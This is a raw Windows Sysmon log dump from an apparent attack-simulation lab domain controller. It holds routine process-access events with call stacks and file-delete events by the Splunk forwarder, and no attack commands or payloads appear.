09:21:45.577{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055568Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.577{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055567Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.577{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CBD-6151-0A00-00000000FD01}624C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a16d|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055566Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.577{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8D29-6151-8E00-00000000FD01}4160C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055565Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.577{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8D29-6151-8E00-00000000FD01}4160C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055564Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.561{5EBD8912-8D29-6151-8C00-00000000FD01}3408784C:\Windows\System32\RuntimeBroker.exe{5EBD8912-8D29-6151-8E00-00000000FD01}4160C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\System32\TokenBroker.dll+1158a|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+129f|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+8addb|C:\Windows\System32\combase.dll+8c2d2|C:\Windows\System32\combase.dll+39b93|C:\Windows\System32\combase.dll+8c4dd|C:\Windows\System32\combase.dll+37f4c|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001055563Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.561{5EBD8912-8D29-6151-8C00-00000000FD01}3408784C:\Windows\System32\RuntimeBroker.exe{5EBD8912-8D29-6151-8E00-00000000FD01}4160C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|C:\Windows\System32\TokenBroker.dll+22ee6|C:\Windows\System32\TokenBroker.dll+114b3|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+129f|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+8addb|C:\Windows\System32\combase.dll+8c2d2|C:\Windows\System32\combase.dll+39b93|C:\Windows\System32\combase.dll+8c4dd|C:\Windows\System32\combase.dll+37f4c|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 23542300x80000000000000001055562Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.546{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C553FFFD8E05A76D933D78B569B173A8,SHA256=10F079917F98ACB09AFE4838793C7F659EC1267651AA8BD9987D909CAEC0F9AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055561Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.546{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=975C3DA2D7012995AF6A4B966833A876,SHA256=6399904F906422E9562A15D16B95DBCFF886DD5817325AB32C9B7DF42C0677FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055560Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.530{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=040F5F073E953EB49B65A749ECB7F8B5,SHA256=3A35C88196913BC41EDF69B5D58120628133EE823D5BFB350627E70E719E9D76,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055559Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.530{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055558Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.530{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055557Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.530{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055556Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.530{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055555Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.483{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B88414D2BA37646AE272CAD0DEF3F889,SHA256=6A6B194B77EA267511EF7C04EA6755E7937C62C60DA1985FB02558E7670A0D37,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055554Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.421{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055553Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.421{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055552Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.421{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+3a1a|c:\windows\system32\SYSNTFY.dll+1e8d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49e78|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055551Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.421{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055550Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.421{5EBD8912-8D26-6151-8500-00000000FD01}27602120C:\Windows\system32\csrss.exe{5EBD8912-8D29-6151-9000-00000000FD01}4248C:\Windows\system32\ServerManagerLauncher.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055549Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.421{5EBD8912-8CC0-6151-1600-00000000FD01}12963068C:\Windows\system32\svchost.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\sessenv.dll+3de88|c:\windows\system32\sessenv.dll+f881|c:\windows\system32\sessenv.dll+677c|c:\windows\system32\SYSNTFY.dll+1e8d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49e78|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055548Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.405{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055547Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.405{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055546Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.405{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055545Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.405{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055544Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.405{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8D29-6151-9000-00000000FD01}4248C:\Windows\system32\ServerManagerLauncher.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055543Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:45.405{5EBD8912-8CC0-6151-1600-00000000FD01}12963068C:\Windows\system32\svchost.exe{5EBD8912-8D29-6151-9000-00000000FD01}4248C:\Windows\system32\ServerManagerLauncher.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\UBPM.dll+acf0|c:\windows\system32\UBPM.dll+fa34|c:\windows\system32\UBPM.dll+cdcc|c:\windows\system32\UBPM.dll+108c6|c:\windows\system32\UBPM.dll+d439|c:\windows\system32\UBPM.dll+dc95|c:\windows\system32\UBPM.dll+e9dd|c:\windows\system32\UBPM.dll+e1ba|c:\windows\system32\UBPM.dll+de12|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b55|C:\Windows\SYSTEM32\ntdll.dll+6585d|C:\Windows\SYSTEM32\ntdll.dll+656c0|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 